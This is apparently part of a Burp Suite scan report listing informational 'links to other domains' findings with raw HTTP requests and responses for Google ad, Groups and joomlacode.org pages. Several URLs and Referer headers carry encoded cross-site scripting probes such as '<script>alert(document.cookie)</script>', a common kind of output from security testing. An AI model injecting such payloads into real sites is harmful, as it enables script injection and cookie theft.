  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2719533347097950&output=html&h=90&slotname=0093365503&w=728&lmt=1295906670&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(String.fromCharCode(88%2C83%2C83))%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885070457&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6395072094&correlator=1295885070450&frm=0&adk=2318622855&ga_vid=161969690.1295885070&ga_sid=1295885070&ga_hid=1617968269&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F10&fu=0&ifi=2&dtd=2&xpc=Rm5eYCJ1YN&p=http%3A//www25.big.jp
The response contains the following links to other domains:
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-ja-100c-ffffff.png
  • http://pagead2.googlesyndication.com/pagead/images/i.png
  • http://pagead2.googlesyndication.com/pagead/js/abg.js
  • http://pagead2.googlesyndication.com/pagead/js/graphics.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(String.fromCharCode(88,83,83))%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3Dwww.imesh.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGzMY54De5fwfIw2VK9BuljS8qKdw

Request

GET /pagead/ads?client=ca-pub-2719533347097950&output=html&h=90&slotname=0093365503&w=728&lmt=1295906670&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(String.fromCharCode(88%2C83%2C83))%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885070457&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6395072094&correlator=1295885070450&frm=0&adk=2318622855&ga_vid=161969690.1295885070&ga_sid=1295885070&ga_hid=1617968269&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F10&fu=0&ifi=2&dtd=2&xpc=Rm5eYCJ1YN&p=http%3A//www25.big.jp HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www25.big.jp/~jamfe517%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3Ec6ee4a3cfa8/leafnode+/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:00:23 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 7682

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(String.fromCharCode(88,83,83))%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3Dwww.imesh.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGzMY54De5fwfIw2VK9BuljS8qKdw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-ja-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.67. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4580112719386696&output=html&h=90&slotname=2469587526&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Ftweetmeme.com%2F&dt=1295907699384&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295907699412&frm=1&adk=3587140093&ga_vid=1600525813.1295907699&ga_sid=1295907699&ga_hid=33325925&ga_fc=0&u_tz=-360&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2529230422&eid=30143103&fu=0&ifi=1&dtd=39
The response contains the following links to other domains:
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
  • http://pagead2.googlesyndication.com/pagead/sma8.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://tweetmeme.com/%26hl%3Den%26client%3Dca-pub-4580112719386696%26adU%3Dwww.JJKeller.com%26adT%3DJJ%2BKeller%2BVideo%2BTraining%26adU%3Dwww.macrooil.com%26adT%3DEmergency%2BFuel%2BProvider%26adU%3Dwww.StudyatAPU.com%26adT%3DEmergency%2BResponse%2BDegree%26gl%3DUS&usg=AFQjCNG9hCNLbjFP5ugqjZwXGCCm14Z-6A

Request

GET /pagead/ads?client=ca-pub-4580112719386696&output=html&h=90&slotname=2469587526&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Ftweetmeme.com%2F&dt=1295907699384&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295907699412&frm=1&adk=3587140093&ga_vid=1600525813.1295907699&ga_sid=1295907699&ga_hid=33325925&ga_fc=0&u_tz=-360&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2529230422&eid=30143103&fu=0&ifi=1&dtd=39 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home_leaderboard_iframe&width=728&height=90&rand=99954773672
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:20:54 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12118

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#95cd3c;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://tweetmeme.com/%26hl%3Den%26client%3Dca-pub-4580112719386696%26adU%3Dwww.JJKeller.com%26adT%3DJJ%2BKeller%2BVideo%2BTraining%26adU%3Dwww.macrooil.com%26adT%3DEmergency%2BFuel%2BProvider%26adU%3Dwww.StudyatAPU.com%26adT%3DEmergency%2BResponse%2BDegree%26gl%3DUS&amp;usg=AFQjCNG9hCNLbjFP5ugqjZwXGCCm14Z-6A" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.68. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1167317790835381&output=html&h=90&slotname=4186215650&w=728&lmt=1295924672&flash=10.1.103&url=http%3A%2F%2Fwww.masjo.com%2Fsearch%2Flearn%2Btyping%2Bquick%2Band%2Beasy%2Bcracka074f%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec4a5acfda9b%2Fpage%2F419%2Fx22&dt=1295903072605&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903072701&frm=0&adk=2067819403&ga_vid=1825936610.1295903073&ga_sid=1295903073&ga_hid=1582079438&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1139&bih=1012&eid=36813006&ref=http%3A%2F%2Fburp%2Fshow%2F30&fu=0&ifi=1&dtd=129&xpc=3dz1EGZpFY&p=http%3A//www.masjo.com
The response contains the following links to other domains:
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
  • http://pagead2.googlesyndication.com/pagead/js/graphics.js
  • http://pagead2.googlesyndication.com/pagead/sma8.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.masjo.com/search/learn%252Btyping%252Bquick%252Band%252Beasy%252Bcracka074f%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec4a5acfda9b/page/419/x22%26hl%3Den%26client%3Dca-pub-1167317790835381%26adU%3DPhoenix.edu%26adT%3DUniversity%2Bof%2BPhoenix%25C2%25AE%26adU%3DEventsManager.GFI.Com%26adT%3DGFI%2BEventsManager%25E2%2584%25A2%2B2010%26adU%3Dwww.CustomTyping.com%26adT%3DLearn%2Bto%2BType%2BOnline%26gl%3DUS&usg=AFQjCNFlIjiuoT6JxPLSveHug_RFaD2moQ

Request

GET /pagead/ads?client=ca-pub-1167317790835381&output=html&h=90&slotname=4186215650&w=728&lmt=1295924672&flash=10.1.103&url=http%3A%2F%2Fwww.masjo.com%2Fsearch%2Flearn%2Btyping%2Bquick%2Band%2Beasy%2Bcracka074f%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec4a5acfda9b%2Fpage%2F419%2Fx22&dt=1295903072605&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903072701&frm=0&adk=2067819403&ga_vid=1825936610.1295903073&ga_sid=1295903073&ga_hid=1582079438&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1139&bih=1012&eid=36813006&ref=http%3A%2F%2Fburp%2Fshow%2F30&fu=0&ifi=1&dtd=129&xpc=3dz1EGZpFY&p=http%3A//www.masjo.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.masjo.com/search/learn+typing+quick+and+easy+cracka074f%3Cscript%3Ealert(document.cookie)%3C/script%3Ec4a5acfda9b/page/419/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 21:03:50 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 14841

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#3088ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.masjo.com/search/learn%252Btyping%252Bquick%252Band%252Beasy%252Bcracka074f%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec4a5acfda9b/page/419/x22%26hl%3Den%26client%3Dca-pub-1167317790835381%26adU%3DPhoenix.edu%26adT%3DUniversity%2Bof%2BPhoenix%25C2%25AE%26adU%3DEventsManager.GFI.Com%26adT%3DGFI%2BEventsManager%25E2%2584%25A2%2B2010%26adU%3Dwww.CustomTyping.com%26adT%3DLearn%2Bto%2BType%2BOnline%26gl%3DUS&amp;usg=AFQjCNFlIjiuoT6JxPLSveHug_RFaD2moQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.69. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4580112719386696&output=html&h=90&slotname=2469587526&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Ftweetmeme.com%2F&dt=1295907699384&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295907699412&frm=1&adk=3587140093&ga_vid=1600525813.1295907699&ga_sid=1295907699&ga_hid=33325925&ga_fc=0&u_tz=-360&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2529230422&eid=30143103&fu=0&ifi=1&dtd=39
The response contains the following link to another domain:
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://tweetmeme.com/%26hl%3Den%26client%3Dca-pub-4580112719386696%26adU%3DCustomizedGirl.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGbOoZRaASFs_0z2XURgRuv_kgEfw

Request

GET /pagead/ads?client=ca-pub-4580112719386696&output=html&h=90&slotname=2469587526&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Ftweetmeme.com%2F&dt=1295907699384&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295907699412&frm=1&adk=3587140093&ga_vid=1600525813.1295907699&ga_sid=1295907699&ga_hid=33325925&ga_fc=0&u_tz=-360&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2529230422&eid=30143103&fu=0&ifi=1&dtd=39 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home_leaderboard_iframe&width=728&height=90&rand=99954773672
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 03:01:59 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3756

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<font style="line-height:8px; font-size:9px" face="arial,sans-serif" color="#000000"><a target="_blank" href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://tweetmeme.com/%26hl%3Den%26client%3Dca-pub-4580112719386696%26adU%3DCustomizedGirl.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGbOoZRaASFs_0z2XURgRuv_kgEfw">Ads by Google</a>
...[SNIP]...

20.70. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8179195001597106&output=html&h=250&slotname=8789264665&w=250&lmt=1295902516&flash=10.1.103&url=http%3A%2F%2Fwww.x64bitdownload.com%2Fdownloads%2Ft-64-bit-ozum-download-lhtivuds.html&dt=1295880916283&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=0011327600%2C8789264665&correlator=1295880916252&frm=0&adk=3608328539&ga_vid=456036966.1295880916&ga_sid=1295880916&ga_hid=300189884&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=3&dtd=4&xpc=jbDpm4xTyb&p=http%3A//www.x64bitdownload.com
The response contains the following link to another domain:
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html%26hl%3Den%26client%3Dca-pub-8179195001597106%26adU%3DChrome.Google.com/webstore%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGDyJXjBicaux7pjfzULNTZbHz4kg

Request

GET /pagead/ads?client=ca-pub-8179195001597106&output=html&h=250&slotname=8789264665&w=250&lmt=1295902516&flash=10.1.103&url=http%3A%2F%2Fwww.x64bitdownload.com%2Fdownloads%2Ft-64-bit-ozum-download-lhtivuds.html&dt=1295880916283&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=0011327600%2C8789264665&correlator=1295880916252&frm=0&adk=3608328539&ga_vid=456036966.1295880916&ga_sid=1295880916&ga_hid=300189884&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=3&dtd=4&xpc=jbDpm4xTyb&p=http%3A//www.x64bitdownload.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 14:54:41 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 7536

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<font style="line-height:8px; font-size:9px" face="arial,sans-serif" color="#000000"><a target="_blank" href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html%26hl%3Den%26client%3Dca-pub-8179195001597106%26adU%3DChrome.Google.com/webstore%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGDyJXjBicaux7pjfzULNTZbHz4kg">Ads by Google</a>
...[SNIP]...

20.71. http://groups.google.com/groups

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /groups

Issue detail

The page was loaded from a URL containing a query string:
  • http://groups.google.com/groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg
The response contains the following link to another domain:
  • http://www.youtube.com/?hl=en&q=ges&ie=UTF-8&tab=g1

Request

GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:36:04 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=2b64ca1fcad5a4bd:TM=1295908564:LM=1295908564:S=MyGWGTVSpmzhW4bn; expires=Wed, 23-Jan-2013 22:36:04 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: DiscussionFE
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>Google Groups</title><link href="/groups/search_static/u7kY4_DCZv8/dfe.css" rel="stylesheet" type="text/css"><style>
...[SNIP]...
</b> <a href="http://www.youtube.com/?hl=en&q=ges&ie=UTF-8&tab=g1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.72. http://groups.google.com/grphp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /grphp

Issue detail

The page was loaded from a URL containing a query string:
  • http://groups.google.com/grphp?hl=en&tab=wg
The response contains the following links to other domains:
  • http://www.google-analytics.com/urchin.js
  • http://www.youtube.com/?hl=en&tab=g1

Request

GET /grphp?hl=en&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d5d7e6f18963b781:TM=1295908561:LM=1295908561:S=vJ6VGOJhbNke8S1Z; expires=Wed, 23-Jan-2013 22:36:01 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:36:01 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</b> <a href="http://www.youtube.com/?hl=en&tab=g1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...

20.73. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp

Issue detail

The page was loaded from a URL containing a query string:
  • http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp;usg=AFQjCNFj-GEcBxmH6Kn-9FQXRDtCJ2gzsQ\
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://developer.joomla.org/
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://feeds.joomla.org/JoomlaSecurityNews
  • http://forum.joomla.org/
  • http://gforge.org/projects/as-help
  • http://gforgegroup.com/
  • http://gforgegroup.com/es/help.php?section=
  • http://help.joomla.org/
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://shop.joomla.org/
  • http://www.joomla.org/
  • http://www.joomla.org/about-joomla.html
  • http://www.joomla.org/accessibility-statement.html
  • http://www.joomla.org/privacy-policy.html
  • http://www.opensourcematters.org/
  • http://www.rochenhost.com/
  • https://gforge.com/gf/project/eclipse/
  • https://gforge.com/gf/project/msproject/
  • https://gforge.com/gf/project/office-addin/
  • https://gforge.com/gf/project/soapsdk/
  • https://gforge.com/gf/project/vsplugin/

Request

GET /gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp;usg=AFQjCNFj-GEcBxmH6Kn-9FQXRDtCJ2gzsQ\ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:16:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
